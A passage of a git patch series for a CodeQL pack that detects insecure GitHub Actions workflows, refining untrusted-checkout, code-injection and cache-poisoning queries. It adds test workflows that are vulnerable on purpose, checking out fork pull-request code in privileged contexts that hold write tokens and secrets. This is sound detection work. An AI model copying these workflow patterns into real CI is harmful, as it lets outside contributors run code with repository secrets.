a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql index 2144db7afa0c..ff9148ab5833 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql @@ -18,7 +18,7 @@ import codeql.actions.security.PoisonableSteps from ControlCheck check, MutableRefCheckoutStep checkout where // the job can be triggered by an external user - check.getEnclosingJob().isExternallyTriggerable() and + inPrivilegedExternallyTriggerableJob(check) and // the mutable checkout step is protected by an access check check = [checkout.getIf(), checkout.getEnclosingJob().getIf()] and // the checked-out code may lead to arbitrary code execution diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql index 11dfa7fc5670..c1118bc00cab 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql @@ -18,7 +18,7 @@ import codeql.actions.security.PoisonableSteps from ControlCheck check, MutableRefCheckoutStep checkout where // the job can be triggered by an external user - check.getEnclosingJob().isExternallyTriggerable() and + inPrivilegedExternallyTriggerableJob(check) and // the mutable checkout step is protected by an access check check = [checkout.getIf(), checkout.getEnclosingJob().getIf()] and // there are no evidences that the checked-out code can lead to arbitrary code execution diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 298c4ce75a48..4fb130aa07a8 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -233,7 +233,6 @@ nodes | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | semmle.label | needs.parse-issue.outputs.payload | | .github/workflows/test4.yml:15:21:15:55 | toJSON(github.event.comment) | semmle.label | toJSON(github.event.comment) | | .github/workflows/test4.yml:19:21:19:53 | toJSON(github.event.issue) | semmle.label | toJSON(github.event.issue) | -| .github/workflows/test4.yml:23:21:23:41 | toJSON(github) | semmle.label | toJSON(github) | | .github/workflows/test4.yml:27:21:27:47 | toJSON(github.event) | semmle.label | toJSON(github.event) | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | From 367531a6597fcfd5a09735bd7c9e9a372ea6a446 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 22 May 2024 11:08:22 +0200 Subject: [PATCH 305/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index b3f4a7b112ee..649064e1ddd5 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.27 +version: 0.0.28 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index c0aa886d0429..d0d7e48a1b2e 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.27 +version: 0.0.28 groups: - actions - queries From 33ae3b1625dc60d5b9a8c32b1e70fe0920395c17 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 22 May 2024 18:53:39 +0200 Subject: [PATCH 306/707] minor updates --- .../actions/security/PoisonableSteps.qll | 2 +- .../security/UntrustedCheckoutQuery.qll | 4 +-- .../CWE-349/.github/workflows/test17.yml | 27 +++++++++++++++++++ 3 files changed, 30 insertions(+), 3 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test17.yml diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index 40dfbd3a0b09..646dc35d1f4e 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -5,7 +5,7 @@ abstract class PoisonableStep extends Step { } // source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/rules/untrusted_checkout_exec.rego#L16 private string dangerousActions() { result = - ["pre-commit/action", "oxsecurity/megalinter", "bridgecrewio/checkov-action", "ruby/setup-ruby"] + ["pre-commit/action", "oxsecurity/megalinter", "bridgecrewio/checkov-action", "ruby/setup-ruby", "actions/jekyll-build-pages"] } class DangerousActionUsesStep extends PoisonableStep, UsesStep { diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index aeceaa8da756..3bc1f3649a3b 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -108,8 +108,8 @@ class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesSt exists(StepsExpression e | this.getArgumentExpr("ref") = e and ( - e.getStepId().matches(["%ref%", "%branch%"]) or - e.getFieldName().matches(["%ref%", "%branch%"]) + e.getStepId().matches(["%head%", "%pull_request%", "%_pr_%"]) or + e.getFieldName().matches(["%head%", "%pull_request%", "%_pr_%"]) ) ) ) diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test17.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test17.yml new file mode 100644 index 000000000000..60ba26406c62 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test17.yml @@ -0,0 +1,27 @@ +name: Test + +on: + # Runs on pull requests targeting the default branch + pull_request_target: + branches: ["main"] + +jobs: + build: + # Limit permissions of the GITHUB_TOKEN for untrusted code + permissions: + contents: read + runs-on: ubuntu-latest + steps: + - name: Checkout + uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + - name: Setup Pages + uses: actions/configure-pages@v5 + - name: Build with Jekyll + uses: actions/jekyll-build-pages@v1 + with: + source: ./ + destination: ./_site + From 16a752280785289f02297e6995bba7a4a97e5ea5 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 22 May 2024 23:24:17 +0200 Subject: [PATCH 307/707] Improve Untrusted checkout queries --- ql/lib/codeql/actions/ast/internal/Ast.qll | 31 ++++++++++++----- .../security/UntrustedCheckoutQuery.qll | 8 ++--- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- .../CWE-094/CodeInjectionCritical.expected | 2 ++ .../CWE-094/CodeInjectionMedium.expected | 2 -- .../Security/CWE-349/CachePoisoning.expected | 1 + .../CWE-829/.github/workflows/mend.yml | 33 +++++++++++++++++++ .../workflows/priv_pull_request_checkout.yml | 23 +++++++++++++ .../CWE-829/UnpinnedActionsTag.expected | 1 + .../UntrustedCheckoutCritical.expected | 2 ++ 11 files changed, 90 insertions(+), 17 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/mend.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/priv_pull_request_checkout.yml diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index ebe2c70533d9..61f0fa8e36e9 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -748,7 +748,13 @@ class JobImpl extends AstNodeImpl, TJobNode { /** Holds if the job can be triggered by an external actor. */ predicate isExternallyTriggerable() { - externallyTriggerableEventsDataModel(this.getATriggerEvent().getName()) + // the job is triggered by an event that can be triggered externally + externallyTriggerableEventsDataModel(this.getATriggerEvent().getName()) or + // the job is triggered by a workflow_call event that can be triggered externally + this.getATriggerEvent().getName() = "workflow_call" and + (exists(ExpressionImpl e, string external_trigger | e.getEnclosingJob() = this and e.getExpression().matches("%github.event" + external_trigger + "%") and externallyTriggerableEventsDataModel(external_trigger)) + or + this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller().isExternallyTriggerable()) } /** Holds if the job is privileged. */ @@ -775,7 +781,9 @@ class JobImpl extends AstNodeImpl, TJobNode { private predicate hasExplicitSecretAccess() { // the job accesses a secret other than GITHUB_TOKEN exists(SecretsExpressionImpl expr | - expr.getEnclosingJob() = this and not expr.getFieldName() = "GITHUB_TOKEN" + (expr.getEnclosingJob() = this or not exists(expr.getEnclosingJob())) and + expr.getEnclosingWorkflow() = this.getEnclosingWorkflow() and + not expr.getFieldName() = "GITHUB_TOKEN" ) } @@ -803,16 +811,21 @@ class JobImpl extends AstNodeImpl, TJobNode { } private predicate hasPrivilegedTrigger() { - // For workflows that are triggered by the pull_request_target event, the GITHUB_TOKEN is granted read/write repository permission unless the permissions key is specified and the workflow can access secrets, even when it is triggered from a fork. - // The Job is triggered by an event other than `pull_request` + // the Job is triggered by an event other than `pull_request` count(this.getATriggerEvent()) = 1 and - not this.getATriggerEvent().getName() = ["pull_request", "workflow_call"] + not this.getATriggerEvent().getName() = "pull_request" and + not this.getATriggerEvent().getName() = "workflow_call" or - // The Workflow is a Reusable Workflow only and there is - // a privileged caller workflow - this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller().isPrivileged() + // the Workflow is a Reusable Workflow only and there is + // a privileged caller workflow or we cant find a caller + count(this.getATriggerEvent()) = 1 and + this.getATriggerEvent().getName() = "workflow_call" and + ( + this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller().isPrivileged() or + not exists(this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller()) + ) or - // The Workflow has multiple triggers so at least one is not "pull_request" + // the Workflow has multiple triggers so at least one is not "pull_request" count(this.getATriggerEvent()) > 1 } diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index 3bc1f3649a3b..6c3b042d1e7d 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -108,8 +108,8 @@ class ActionsMutableRefCheckout extends MutableRefCheckoutStep instanceof UsesSt exists(StepsExpression e | this.getArgumentExpr("ref") = e and ( - e.getStepId().matches(["%head%", "%pull_request%", "%_pr_%"]) or - e.getFieldName().matches(["%head%", "%pull_request%", "%_pr_%"]) + e.getStepId().matches("%" + ["head", "branch", "ref"] + "%") or + e.getFieldName().matches("%" + ["head", "branch", "ref"] + "%") ) ) ) @@ -138,8 +138,8 @@ class ActionsSHACheckout extends SHACheckoutStep instanceof UsesStep { exists(StepsExpression e | this.getArgumentExpr("ref") = e and ( - e.getStepId().matches(["%sha%", "%commit%"]) or - e.getFieldName().matches(["%sha%", "%commit%"]) + e.getStepId().matches("%" + ["head", "sha", "commit"] + "%") or + e.getFieldName().matches("%" + ["head", "sha", "commit"] + "%") ) ) ) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 649064e1ddd5..30aa95964e10 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.28 +version: 0.0.29 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index d0d7e48a1b2e..4c89d7804a90 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.28 +version: 0.0.29 groups: - actions - queries diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 67c8bbc2b654..ac4761deda1f 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -315,6 +315,8 @@ subpaths | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | +| .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | ${{ env.log }} | +| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | ${{ env.log }} | | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 4fb130aa07a8..c69af0316bf5 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -283,7 +283,5 @@ subpaths | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | -| .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | ${{ env.log }} | -| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | ${{ env.log }} | | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected index 6bef24d86d79..d434bd63c518 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected @@ -9,3 +9,4 @@ | .github/workflows/test11.yml:14:9:19:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test11.yml:19:9:23:6 | Uses Step | Uses Step | | .github/workflows/test15.yml:14:9:17:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test15.yml:17:9:21:6 | Uses Step | Uses Step | | .github/workflows/test16.yml:14:9:17:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test16.yml:17:9:21:6 | Uses Step | Uses Step | +| .github/workflows/test17.yml:15:9:20:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test17.yml:22:9:26:31 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/mend.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/mend.yml new file mode 100644 index 000000000000..b539c562084e --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/mend.yml @@ -0,0 +1,33 @@ +name: Test + +on: + workflow_call: + +env: + API_KEY: ${{ secrets.API_KEY != '' && secrets.API_KEY }} + +jobs: + mend: + runs-on: "ubuntu-latest" + steps: + - name: "Set the checkout ref" + id: set_ref + run: | + if [[ "${{ github.event_name }}" == "pull_request_target" ]]; then + echo "ref=${{ github.event.pull_request.head.sha }}" >> $GITHUB_OUTPUT + else + echo "ref=${{ github.ref }}" >> $GITHUB_OUTPUT + fi + + - name: "checkout" + if: success() + uses: "actions/checkout@v4" + with: + fetch-depth: 1 + ref: ${{ steps.set_ref.outputs.ref }} + + - name: "setup ruby" + if: success() + uses: "ruby/setup-ruby@v1" + with: + ruby-version: 2.7 diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/priv_pull_request_checkout.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/priv_pull_request_checkout.yml new file mode 100644 index 000000000000..d8381176fd23 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/priv_pull_request_checkout.yml @@ -0,0 +1,23 @@ +name: Test + +on: + pull_request: + +permissions: + contents: write + pull-requests: write + +jobs: + test: + runs-on: ubuntu-latest + steps: + - name: Check out repo on head ref + uses: actions/checkout@93ea575cb5d8a053eaa0ac8fa3b40d7e05a33cc8 + with: + ref: ${{ github.head_ref }} + token: ${{ secrets.DOCUBOT_REPO_PAT }} + + - run: | + ./cmd + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index dbbfba0a5574..b048fb398a4b 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected @@ -14,4 +14,5 @@ | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref '2', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Uses Step | | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref '1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Uses Step | | .github/workflows/level0.yml:36:9:39:6 | Uses Step | Unpinned 3rd party Action 'Poutine Level 0' step $@ uses 'rlespinasse/github-slug-action' with ref '4', not a pinned commit hash | .github/workflows/level0.yml:36:9:39:6 | Uses Step | Uses Step | +| .github/workflows/mend.yml:29:9:33:28 | Uses Step | Unpinned 3rd party Action 'Test' step $@ uses 'ruby/setup-ruby' with ref '1', not a pinned commit hash | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Uses Step | | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref '1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index ca86bac14f0e..1f90c56607df 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -3,5 +3,7 @@ | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/level0.yml:99:9:103:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/level0.yml:125:9:129:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/mend.yml:22:9:29:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 1fc45eb2969202fda4690a095dd9889746e16e88 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 24 May 2024 09:33:35 +0200 Subject: [PATCH 308/707] Improve ControlCheck for untrusted checkouts --- .../security/UntrustedCheckoutQuery.qll | 28 ++++++-- .../CWE-367/UntrustedCheckoutTOCTOUHigh.ql | 6 +- .../CWE-829/UntrustedCheckoutCritical.ql | 7 +- .../Security/CWE-829/UntrustedCheckoutHigh.ql | 13 ++-- .../CWE-829/UntrustedCheckoutMedium.ql | 6 +- .../CWE-829/.github/workflows/dependabot1.yml | 45 ++++++++++++ .../CWE-829/.github/workflows/dependabot2.yml | 68 +++++++++++++++++++ .../CWE-829/.github/workflows/test2.yml | 20 ++++++ .../UntrustedCheckoutCritical.expected | 2 + .../CWE-829/UntrustedCheckoutHigh.expected | 1 + 10 files changed, 177 insertions(+), 19 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot1.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot2.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test2.yml diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index 6c3b042d1e7d..ba31b0de500a 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -227,7 +227,14 @@ class GhSHACheckout extends SHACheckoutStep instanceof Run { } /** An If node that contains an actor, user or label check */ -abstract class ControlCheck extends If { } +abstract class ControlCheck extends If { + predicate dominates(Step step) { + step.getIf() = this or + step.getEnclosingJob().getIf() = this or + step.getEnclosingJob().getANeededJob().(LocalJob).getAStep().getIf() = this or + step.getEnclosingJob().getANeededJob().(LocalJob).getIf() = this + } +} class LabelControlCheck extends ControlCheck { LabelControlCheck() { @@ -244,15 +251,28 @@ class LabelControlCheck extends ControlCheck { class ActorControlCheck extends ControlCheck { ActorControlCheck() { - // eg: contains(github.actor, 'dependabot') - // eg: github.triggering_actor != 'CI Agent' + // eg: github.actor == 'dependabot[bot]' + // eg: github.triggering_actor == 'CI Agent' // eg: github.event.pull_request.user.login == 'mybot' exists( normalizeExpr(this.getCondition()) .regexpFind([ "\\bgithub\\.actor\\b", "\\bgithub\\.triggering_actor\\b", "\\bgithub\\.event\\.comment\\.user\\.login\\b", - "\\bgithub\\.event\\.pull_request\\.user\\.login\\b", + "\\bgithub\\.event\\.pull_request\\.user\\.login\\b", + ], _, _) + ) + } +} + +class RepositoryControlCheck extends ControlCheck { + RepositoryControlCheck() { + // eg: github.repository == 'test/foo' + exists( + normalizeExpr(this.getCondition()) + .regexpFind([ + "\\bgithub\\.repository\\b", + "\\bgithub\\.repository_owner\\b", ], _, _) ) } diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql index c1118bc00cab..ca1b855c6ece 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql @@ -2,9 +2,9 @@ * @name Untrusted Checkout TOCTOU * @description Untrusted Checkout is protected by a security check but the checked-out branch can be changed after the check. * @kind problem - * @problem.severity warning - * @precision medium - * @security-severity 5.3 + * @problem.severity error + * @precision high + * @security-severity 7.5 * @id actions/untrusted-checkout-toctou/high * @tags actions * security diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql index 0a597ee3fa48..eae580ebd528 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql @@ -21,10 +21,11 @@ from LocalJob j, PRHeadCheckoutStep checkout where j = checkout.getEnclosingJob() and j.getAStep() = checkout and + // the checkout is followed by a known poisonable step checkout.getAFollowingStep() instanceof PoisonableStep and - not exists(ControlCheck check | - checkout.getIf() = check or checkout.getEnclosingJob().getIf() = check - ) and + // the checkout is not controlled by an access check + not exists(ControlCheck check | check.dominates(checkout)) and + // the checkout occurs in a privileged context ( inPrivilegedCompositeAction(checkout) or diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql index 29a15accdf27..9faab24dbcbe 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql @@ -4,9 +4,9 @@ * By explicitly checking out and running the build script from a fork the untrusted code is running in an environment * that is able to push to the base repository and to access secrets. * @kind problem - * @problem.severity warning - * @precision medium - * @security-severity 5.3 + * @problem.severity error + * @precision high + * @security-severity 7.5 * @id actions/untrusted-checkout/high * @tags actions * security @@ -21,10 +21,11 @@ from LocalJob j, PRHeadCheckoutStep checkout where j = checkout.getEnclosingJob() and j.getAStep() = checkout and + // the checkout is NOT followed by a known poisonable step not checkout.getAFollowingStep() instanceof PoisonableStep and - not exists(ControlCheck check | - checkout.getIf() = check or checkout.getEnclosingJob().getIf() = check - ) and + // the checkout is not controlled by an access check + not exists(ControlCheck check | check.dominates(checkout)) and + // the checkout occurs in a privileged context ( inPrivilegedCompositeAction(checkout) or diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql index aa62a88935b2..574c2d7bffe9 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql @@ -21,9 +21,9 